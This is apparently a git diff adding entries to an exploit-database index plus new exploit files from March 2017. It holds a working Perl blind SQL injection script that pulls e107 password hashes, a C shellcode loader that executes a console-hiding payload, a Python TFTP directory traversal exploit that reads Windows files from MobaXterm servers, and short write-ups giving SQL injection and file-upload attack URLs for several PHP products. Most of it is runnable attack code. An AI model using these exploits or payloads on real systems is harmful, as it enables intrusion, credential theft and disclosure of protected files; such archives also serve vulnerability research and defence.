diff --git a/files.csv b/files.csv index 9d4e2f338..6c7a98050 100644 --- a/files.csv +++ b/files.csv @@ -15313,6 +15313,7 @@ id,file,description,date,author,platform,type,port 41480,platforms/hardware/remote/41480.txt,"WePresent WiPG-1500 - Backdoor Account",2017-02-27,"Quentin Olagne",hardware,remote,0 41511,platforms/windows/remote/41511.py,"FTPShell Client 6.53 - Buffer Overflow",2017-03-04,"Peter Baris",windows,remote,0 41545,platforms/windows/remote/41545.py,"Azure Data Expert Ultimate 2.2.16 - Buffer Overflow",2017-03-07,"Peter Baris",windows,remote,0 +41592,platforms/windows/remote/41592.txt,"MobaXterm Personal Edition 9.4 - Directory Traversal",2017-03-11,hyp3rlinx,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15938,6 +15939,7 @@ id,file,description,date,author,platform,type,port 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 +41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -37493,3 +37495,15 @@ id,file,description,date,author,platform,type,port 41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0 41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0 41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0 +41580,platforms/php/webapps/41580.pl,"e107 <= 2.1.4 - 'keyword' Blind SQL Injection",2017-03-09,StAkeR,php,webapps,0 +41582,platforms/php/webapps/41582.txt,"Domain Marketplace Script - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41583,platforms/php/webapps/41583.txt,"Global In - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41584,platforms/php/webapps/41584.txt,"Global In - Arbitrary File Upload",2017-03-11,"Ihsan Sencan",php,webapps,0 +41585,platforms/php/webapps/41585.txt,"Vanelo - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41593,platforms/php/webapps/41593.txt,"Mirage - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41586,platforms/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/php/webapps/41580.pl b/platforms/php/webapps/41580.pl new file mode 100755 index 000000000..b4899c1eb --- /dev/null +++ b/platforms/php/webapps/41580.pl @@ -0,0 +1,265 @@ +#!/usr/bin/perl +# +# +# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit +# +# -------------------------------------------------------------------------- +# [*] Discovered by staker - staker[at]hotmail[dot]it +# [*] Discovered on 09/03/2017 +# [*] Site Vendor: http://www.e107.org +# [*] BUG: Blind SQL Injection +# -------------------------------------------------------------------------- +# +# +# Description +# ------------------------------------------------------------------------- +# e107 contains one flaw that allows an attacker to carry out an SQL +# injection attack. The issue is due to the "e107_plugins/pm/pm.php" script +# not properly saniting user-supplied input to the "keyword" POST variable +# This may allow an attacker to inject or manipulate sql queries in +# the backend database regardless of php.ini settings +# ------------------------------------------------------------------------- +# SHORT EXPLANATION +# ----------------------------------- +# +# FILE: "e107_handlers/core_functions.php" +# +# 76. function vartrue(&$val, $default='') +# 77. { +# 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database +# 79. return $default; +# 80.} +# +# ---------------------------------- +# +# FILE: "e107/e107_plugins/pm/pm.php" +# +# +# 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function. +# 36. { +# 37. pm_user_lookup(); +# 38.} +# +# +# +# 615. function pm_user_lookup() +# 616. { +# 617. $sql = e107::getDb(); +# 618. +# 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized +# 620. if($sql->gen($query)) +# 621. { +# 622. echo '['; +# 623 while($row = $sql->fetch()) +# 624. { +# 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}"; +# 626. } +# 627. +# 628. echo implode(",",$u); +# 629. echo ']'; +# ----------------------------------- +# +# +# use your brain.. +# +# Greetz to: Warwolfz Crew, +# meh, Dante90, SHADES MASTER and nexen +# +# -- 0gay -- +# +# ----------------------------------- +# YOUR MOM IS NOT SAFE ANYMORE!! +# CALL HER!! +# ----------------------------------- + + + +use strict; +use IO::Socket::INET; +use LWP::UserAgent; + + + + +my ($URL,$uid) = @ARGV; +my @chars = (8..122); +my ($i,$ord,$hash) = (1,undef,undef); + + + + + +if (@ARGV != 2) { usage(); } + + +$URL = parse::URL($URL); + + +syswrite (STDOUT,"[-] Crypted Password: "); + + +for ($i=0;$i<=60;$i++) +{ + + foreach $ord (@chars) + { + + if (e107::Query(sql($i,$ord),$URL) == 666 ) + { + syswrite (STDOUT,chr($ord)); + $hash .= chr($ord); + last; + } + if ($i == 2 and not defined $hash) + { + syswrite (STDOUT,"\n[-] Exploit Failed"); + exit; + } + } +} + + + +if (length($hash) == 60) { + die "\[-]Exploit Successfully"; +} +else { + die "\n[-] Exploit Failed"; +} + + + + + +sub e107::Query +{ + + # 1st parameter, sql query + # 2nd parameter, e107 website + + my ($query,$URL) = @_; + my $response = undef; + + my $lwp = new LWP::UserAgent; + + + $lwp->default_header('User-Agent' => 'Lynx (textmode)'); + + $response = $lwp->post($URL."/pm/", + [ + keyword => $query + ]) or die $!; + + + if ($response->content =~ /caption/) { + return 666; + } + else { + return 0; + } + +} + + +sub parse::URL +{ + my $string = shift @_ || die($!); + + if ($string !~ /^http:\/\/?/i) { + $string = 'http://'.$string; + } + + return $string; + } + + + +sub sql +{ + + # 1st parameter, an e107's userid + # 2nd parameter substring number + # 3rd parameter charcode number + + my ($i,$j,$sql) = (shift,shift,undef); + + $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#"; + + return $sql; +} + + + + + +sub e107::Cookies +{ + + my ($username,$password) = @_; + my ($packet,$content); + + my $host = "127.0.0.1"; # Valid Host (insert it manually) + my $path = "/e107/"; # Valid e107 path (insert it manually) + + + my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In"; + + + my $socket = new IO::Socket::INET( + PeerAddr => $host, + PeerPort => 80, + Proto => 'tcp', + ) or die $!; + + + + $packet .= "POST ".$path."/login.php HTTP/1.1\r\n"; + $packet .= "Host: ".$host."\r\n"; + $packet .= "User-Agent: Lynx (textmode)\r\n"; + $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $packet .= "Content-Length:".length($data)."\r\n"; + $packet .= "Connection: close\r\n\r\n"; + $packet.= $data; + + + $socket->send($packet); + + while (<$socket>) { + $content .= $_; + } + + + if ($content =~ /Set-Cookie: (.+?)/) { + return $1; + } + else { + die("[-] Login Failed..\n"); + } + + + # This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit. + # it works without log-in, but if you got some trouble, try to use this one. + + # e107::Login('YOUR USERNAME','YOUR PASSWORD'); +} + + +sub usage() { + + print "[*---------------------------------------------------------*]\n". + "[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n". + "[*---------------------------------------------------------*]\n". + "[* Usage: perl web.pl [host] [uid] *]\n". + "[* *]\n". + "[* Options: *]\n". + "[* [host] insert a valid host *]\n". + "[* [uid] insert a userid *]\n". + "[*---------------------------------------------------------*]\n"; + exit; + +} + + + + + \ No newline at end of file diff --git a/platforms/php/webapps/41582.txt b/platforms/php/webapps/41582.txt new file mode 100755 index 000000000..c9d7bc5de --- /dev/null +++ b/platforms/php/webapps/41582.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Domain Marketplace Script - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: http://scripteen.com/ +# Software: http://scripteen.com/item/scripts/scripteen-domain-marketplace-script.html +# Demo: http://dwm.domainauctionsscript.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?page=websites_for_sale&cat=[SQL] +# users :userId +# users :data +# users :payment_date +# users :expiration_date +# users :username +# users :password +# users :nume +# users :adresa +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41583.txt b/platforms/php/webapps/41583.txt new file mode 100755 index 000000000..01be6922d --- /dev/null +++ b/platforms/php/webapps/41583.txt @@ -0,0 +1,26 @@ +# # # # # +# Exploit Title: Global In – A LinkedIn Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.techbizstudio.com/ +# Software: https://www.techbizstudio.com/product/linkedin-clone/ +# Demo: https://www.techbizstudio.com/demo/globalin/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/hsearch?accept=true&fnm=[SQL]&lnm=[SQL] +# http://localhost/[PATH]/search?type=company&key=[SQL] [Login as regular user] +# http://localhost/[PATH]/search?type=people&key=[SQL]&fnm=[SQL]&lnm=[SQL]&title=[SQL]&com=[SQL]&sc=[SQL]&co=[SQL]&industry=[SQL] [Login as regular user] +# tb_admin :id +# tb_admin :username +# tb_admin :email +# tb_admin :password +# tb_admin :ip_address +# tb_admin :is_active +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41584.txt b/platforms/php/webapps/41584.txt new file mode 100755 index 000000000..d626dc0c7 --- /dev/null +++ b/platforms/php/webapps/41584.txt @@ -0,0 +1,21 @@ +# # # # # +# Exploit Title: Global In - Arbitrary File Upload +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.techbizstudio.com/ +# Software: https://www.techbizstudio.com/product/linkedin-clone/ +# Demo: https://www.techbizstudio.com/demo/globalin/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# Exploit : +# Login as regular user +# http://localhost/[PATH]/dashboard +# Upload Photo / File.php +# http://localhost/[PATH]/post-images/1113330455_File.php +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41585.txt b/platforms/php/webapps/41585.txt new file mode 100755 index 000000000..e3abcaa54 --- /dev/null +++ b/platforms/php/webapps/41585.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Vanelo – Wanelo Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.zoplay.com/ +# Software: https://www.zoplay.com/web/trending-marketplace-website/ +# Demo: http://wanelo.zoplay.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/shopby/IhsanSencan?q=[SQL] +# Duplicate entry 'waneloclone +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41586.txt b/platforms/php/webapps/41586.txt new file mode 100755 index 000000000..4369ed284 --- /dev/null +++ b/platforms/php/webapps/41586.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Pet Listing Script v3.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/pet-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=petls&front=1&lid=1 +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&listing_search=1&year_from=2017[SQL]&year_to=2017[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41587.txt b/platforms/php/webapps/41587.txt new file mode 100755 index 000000000..06ae642c7 --- /dev/null +++ b/platforms/php/webapps/41587.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Property Listing Script v3.1 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/property-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=pls&front=1&lid=1 +# Version: 3.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1[SQL]&max_bedrooms=1[SQL]&min_bathrooms=1[SQL]&max_bathrooms=2[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41588.txt b/platforms/php/webapps/41588.txt new file mode 100755 index 000000000..6007c2c73 --- /dev/null +++ b/platforms/php/webapps/41588.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Travel Tours Script v2.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/travel-tours-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=vpl&front=1&lid=1 +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&sortby=stars&direction=[SQL]&listing_search=1&type=[SQL]&rating_from=[SQL]&rating_to=[SQL]&price_from=[SQL]&price_to=[SQL] +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41589.txt b/platforms/php/webapps/41589.txt new file mode 100755 index 000000000..fe6c4aa5e --- /dev/null +++ b/platforms/php/webapps/41589.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Yacht Listing Script v2.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/yacht-listing-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=yls&front=1&lid=1 +# Version: 2.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/front.php?controller=pjListings&action=pjActionIndex&listing_search=1&min_year=1948[SQL]&max_year=2017[SQL]&min_loa=6[SQL]&max_loa=20[SQL]&min_length=25[SQL]&max_length=150[SQL]&min_beam=20[SQL]&max_beam=150[SQL] +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41590.txt b/platforms/php/webapps/41590.txt new file mode 100755 index 000000000..d83c15cd5 --- /dev/null +++ b/platforms/php/webapps/41590.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Yellow Pages Script v3.2 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/yellow-pages-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=yps&front=1&lid=1 +# Version: 3.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjListings&action=pjActionIndex&category_id=[SQL] +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41591.txt b/platforms/php/webapps/41591.txt new file mode 100755 index 000000000..1d628714c --- /dev/null +++ b/platforms/php/webapps/41591.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: PHP Forum Script v3.0 - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.phpjabbers.com/ +# Software: https://www.phpjabbers.com/php-forum-script/ +# Demo: http://demo.phpjabbers.com/index.php?demo=pfs&front=1&lid=1 +# Version: 3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/preview.php?controller=pjLoad&action=pjActionIndex&question_search=1&column=[SQL]created&direction=DESC +# Etc.. +# # # # # diff --git a/platforms/php/webapps/41593.txt b/platforms/php/webapps/41593.txt new file mode 100755 index 000000000..ad993b2ad --- /dev/null +++ b/platforms/php/webapps/41593.txt @@ -0,0 +1,19 @@ +# # # # # +# Exploit Title: Mirage – Fancy Clone - SQL Injection +# Google Dork: N/A +# Date: 11.03.2017 +# Vendor Homepage: https://www.zoplay.com/ +# Software: https://www.zoplay.com/web/multi-vendor-clone-website/ +# Demo: http://fancyclone.zoplay.com/ +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail: ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/shopby/IhsanSencan?c=[SQL] +# Duplicate entry 'fancyclone +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/win_x86/shellcode/41581.c b/platforms/win_x86/shellcode/41581.c new file mode 100755 index 000000000..21eb47eed --- /dev/null +++ b/platforms/win_x86/shellcode/41581.c @@ -0,0 +1,113 @@ +/* + +MIT License + +Copyright (c) 2017 Ege Balcı + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + + + +# Win32 - Hide Console Window Shellcode (182 BYTES) +# Date: [11.03.2017] +# Author: [Ege Balcı] +# Tested on: [Win XP/Vista/7/8/8.1/10] + +@egeblc + +------------------------------------------------------------------ + +This shellcode will hide the console window... + +[BITS 32] +[ORG 0] + + +pushad ; Save all register to stack +pushfd ; Save all flags to stack +cld +call Start +%include "API-BLOCK.asm"; Stephen Fewer's hash API from metasploit project + +Start: + pop ebp ; Pop the address of SFHA + + push 0x00000000 ; Push the byte 'user32' ,0,0 + push 0x00003233 ; ... + push 0x72657375 ; ... + push esp ; Push a pointer to the "user32" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "user32" ) + add esp,0x0C ; Clear the stack + + push 0xCE726E89 ; hash("user32.dll", "GetConsoleWindow") + call ebp ; GetConsoleWindow(); + + push 0x00000000 ; 0 + push eax ; Console window handle + push 0x6E2EEBC2 ; hash(User32.dll, ShowWindow) + call ebp ; ShowWindow(HANDLE,SW_HIDE); + + popfd ; Pop back all saved flags + popad ; Pop back all saved registers + ret ; Return + +*/ +#include +#include + +unsigned char Shellcode[] = { + 0x60, 0x9c, 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, + 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, + 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, + 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf2, 0x52, 0x57, + 0x8b, 0x52, 0x10, 0x8b, 0x4a, 0x3c, 0x8b, 0x4c, 0x11, 0x78, 0xe3, 0x48, + 0x01, 0xd1, 0x51, 0x8b, 0x59, 0x20, 0x01, 0xd3, 0x8b, 0x49, 0x18, 0xe3, + 0x3a, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0xac, 0xc1, 0xcf, + 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf6, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, + 0x24, 0x75, 0xe4, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, + 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, + 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x5f, + 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x8d, 0x5d, 0x6a, 0x00, 0x68, 0x33, 0x32, + 0x00, 0x00, 0x68, 0x75, 0x73, 0x65, 0x72, 0x54, 0x68, 0x4c, 0x77, 0x26, + 0x07, 0xff, 0xd5, 0x83, 0xc4, 0x0c, 0x68, 0x89, 0x6e, 0x72, 0xce, 0xff, + 0xd5, 0x6a, 0x00, 0x50, 0x68, 0xc2, 0xeb, 0x2e, 0x6e, 0xff, 0xd5, 0x9d, + 0x61, 0xc3 +}; + + + +void ExecuteShellcode(); + + +int main(int argc, char const *argv[]) +{ + ExecuteShellcode(); + getchar(); + return 0; +} + + +void ExecuteShellcode(){ + char* BUFFER = (char*)VirtualAlloc(NULL, sizeof(Shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(BUFFER, Shellcode, sizeof(Shellcode)); + (*(void(*)())BUFFER)(); +} + + diff --git a/platforms/windows/remote/41592.txt b/platforms/windows/remote/41592.txt new file mode 100755 index 000000000..f32b8947e --- /dev/null +++ b/platforms/windows/remote/41592.txt @@ -0,0 +1,125 @@ +[+] Credits: John Page AKA hyp3rlinx +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt +[+] ISR: ApparitionSec + + + +Vendor: +===================== +mobaxterm.mobatek.net + + + +Product: +=============================== +MobaXterm Personal Edition v9.4 + +Enhanced terminal for Windows with X11 server, tabbed SSH client, network tools and much more. + + + +Vulnerability Type: +===================================== +Path Traversal Remote File Disclosure + + + + +CVE Reference: +============== +CVE-2017-6805 + + + +Security Issue: +================ +Remote attackers can use UDP socket connection to TFTP server port 69 and send Read request, to retrieve otherwise protected files using +directory traversal attacks e.g. ../../../../Windows/system.ini + +Start MobaXterm TFTP server which listens on default TFTP port 69. + +c:\>tftp -i 127.0.0.1 GET ../../../../Windows/system.ini +Transfer successful: 219 bytes in 1 second(s), 219 bytes/s + +c:\xampp\htdocs>type system.ini +; for 16-bit app support +[386Enh] +woafont=dosapp.fon +EGA80WOA.FON=EGA80WOA.FON +EGA40WOA.FON=EGA40WOA.FON +CGA80WOA.FON=CGA80WOA.FON +CGA40WOA.FON=CGA40WOA.FON + +[drivers] +wave=mmdrv.dll +timer=timer.drv + +[mci] + +Victim Data located on: 127.0.0.1 + + + +POC URL: +============================= +https://vimeo.com/207516364 + + + + +Exploit: +========== + +import sys,socket + +print 'MobaXterm TFTP Directory Traversal 0day Exploit' +print 'Read Windows/system.ini' +print 'hyp3rlinx \n' + +HOST = raw_input("[IP]>") +FILE = 'Windows/system.ini' +PORT = 69 + +PAYLOAD = "\x00\x01" #TFTP Read +PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal +PAYLOAD += "netascii\x00" #TFTP Type + +s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +s.sendto(PAYLOAD, (HOST, PORT)) +out = s.recv(1024) +s.close() + +print "Victim Data located on : %s " %(HOST) +print out.strip() + + + +Network Access: +=============== +Remote + + + +Severity: +========= +High + + + +Disclosure Timeline: +============================= +Vendor Notification: No Reply +March 10, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file